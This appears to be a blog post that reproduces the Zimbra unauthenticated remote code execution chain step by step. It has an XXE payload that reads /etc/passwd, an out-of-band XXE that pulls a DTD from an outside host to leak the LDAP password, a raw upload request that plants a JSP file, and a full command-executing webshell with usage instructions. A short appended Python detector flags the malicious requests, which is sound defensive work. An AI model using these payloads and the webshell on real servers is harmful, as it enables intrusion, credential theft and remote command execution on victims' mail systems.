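Zimbra unauthenticated RCE exploitation
I reproduced this by following this PDF, but ran into many problems during the reproduction.
First, use this XXE to read a file: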
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
If that succeeds you can continue. Next, use:
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: mail.xx.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Referer:https://mail.xx.com/zimbra/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZM_TEST=true; ZM_LOGIN_CSRF=3d4a039e-0047-4828-aad1-326545bbb903
Content-Length: 348
<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "http://xss.com/dtd">
%dtd;
%all;
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>
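An HTTP 503 appears; note down the low-privilege account and the value that follows <key name="zimbra_ldap_passwd">.
For the next step, remember to change the address to /service/soap
Finally, when obtaining ZM_ADMIN_AUTH_TOKEN, change the Cookie header to ZM_ADMIN_AUTH_TOKEN=the low-privilege token
In the last step, uploading the shell, it kept reporting that the file upload failed, as shown in the figure (this has troubled many people, including many on T00ls)
Here is the packet directly: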
POST /service/extension/clientUploader/upload HTTP/1.1
Host: mail.xx.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1orxAOGlJBBcOmuz
Content-Length: 353
Cookie:ZM_ADMIN_AUTH_TOKEN=0_530bf417d0f3e55ed628e4671e44b1dea4652bab_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343835323934303131393b61646d696e3d313a313b
Upgrade-Insecure-Requests:1
------WebKitFormBoundary1orxAOGlJBBcOmuz
Content-Disposition:form-data;name="file";filename="abu.jsp"
Content-Type: image/jpeg
asasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasassasasV
------WebKitFormBoundary1orxAOGlJBBcOmuz--
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1orxAOGlJBBcOmuz
This line must be included.
Finally, here is a webshell that can execute commands; the several I found all returned 500 errors.
<%@ page language="java" contentType="text/html; charset=GBK"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>???(l</title>
</head>
<body>
<%
if ("admin".equals(request.getParameter("pwd"))) {
java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int len = -1;
byte[] bytes = new byte[4092];
out.print("<pre>");
while ((len = input.read(bytes)) != -1) {
out.println(new String(bytes, "GBK"));
}
out.print("</pre>");
}
%>
</body>
</html>
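Usage: ?pwd=admin&cmd=whoami
To access the webshell with the cookie you can use the Modify Headers add-on for Firefox. I found that the cookie is only needed in the downloads directory; /js and /img under the root directory do not need it!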
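For the defending side, the two requests in this write-up that stand out in captured traffic are the POST to /Autodiscover/Autodiscover.xml carrying an inline DTD and the multipart POST to /service/extension/clientUploader/upload whose filename ends in .jsp while claiming Content-Type image/jpeg. The following is an added example, not code from the original post or from Zimbra; the finding names, the sample requests and the assumption that legitimate Autodiscover clients never send a DOCTYPE are mine.

```python
import re
from urllib.parse import unquote, urlsplit

# Endpoints taken from the requests shown in this post (compared lowercased).
AUTODISCOVER = "/autodiscover/autodiscover.xml"
UPLOADER = "/service/extension/clientuploader/upload"
# Assumption: legitimate Autodiscover clients never send an inline DTD.
DTD_RE = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.I)
# A multipart part whose filename ends in .jsp/.jspx, whatever Content-Type it claims.
JSP_RE = re.compile(rb'filename\s*=\s*"?[^"\r\n;]*\.jspx?\b', re.I)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, normalised path, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split()
    if len(parts) < 2:
        return None
    # Decode percent-escapes and drop the query so encoded paths still match.
    path = unquote(urlsplit(parts[1]).path).lower()
    return parts[0].upper(), path, body


def classify(raw: bytes):
    """Return the findings for one captured request (empty list = nothing seen)."""
    parsed = parse_request(raw)
    if parsed is None:
        return ["malformed-request"]
    method, path, body = parsed
    findings = []
    if method == "POST" and path == AUTODISCOVER and DTD_RE.search(body):
        findings.append("autodiscover-dtd")
    if method == "POST" and path == UPLOADER and JSP_RE.search(body):
        findings.append("clientuploader-jsp")
    return findings


def _req(line, body):
    return (line + "\r\nHost: mail.example.test\r\n\r\n" + body).encode()

# Constructed sample requests (not real traffic).
SAMPLES = {
    "plain": _req("POST /Autodiscover/Autodiscover.xml HTTP/1.1", "<Autodiscover/>"),
    "dtd": _req("POST /Autodiscover/%41utodiscover.xml HTTP/1.1",
                '<!DOCTYPE a [<!ENTITY % d SYSTEM "http://dtd.example.test/d">]><Autodiscover/>'),
    "jsp": _req("POST /service/extension/clientUploader/upload HTTP/1.1",
                '--b\r\nContent-Disposition:form-data;name="file";filename="x.jsp"\r\n'
                "Content-Type: image/jpeg\r\n\r\ndata\r\n--b--"),
}
```

Calling classify() on each entry of SAMPLES returns an empty list for the plain request and one finding for each of the other two.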
Reference links:
https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html
https://blog.csdn.net/fnmsd/article/details/88657083
http://www.cnvd.org.cn/flaw/show/CNVD-2019-07448
http://www.cnvd.org.cn/flaw/download?cd=20f07bbf4fc4769b606a52a0d14f79dd
https://www.t00ls.net/thread-50662-1-1.html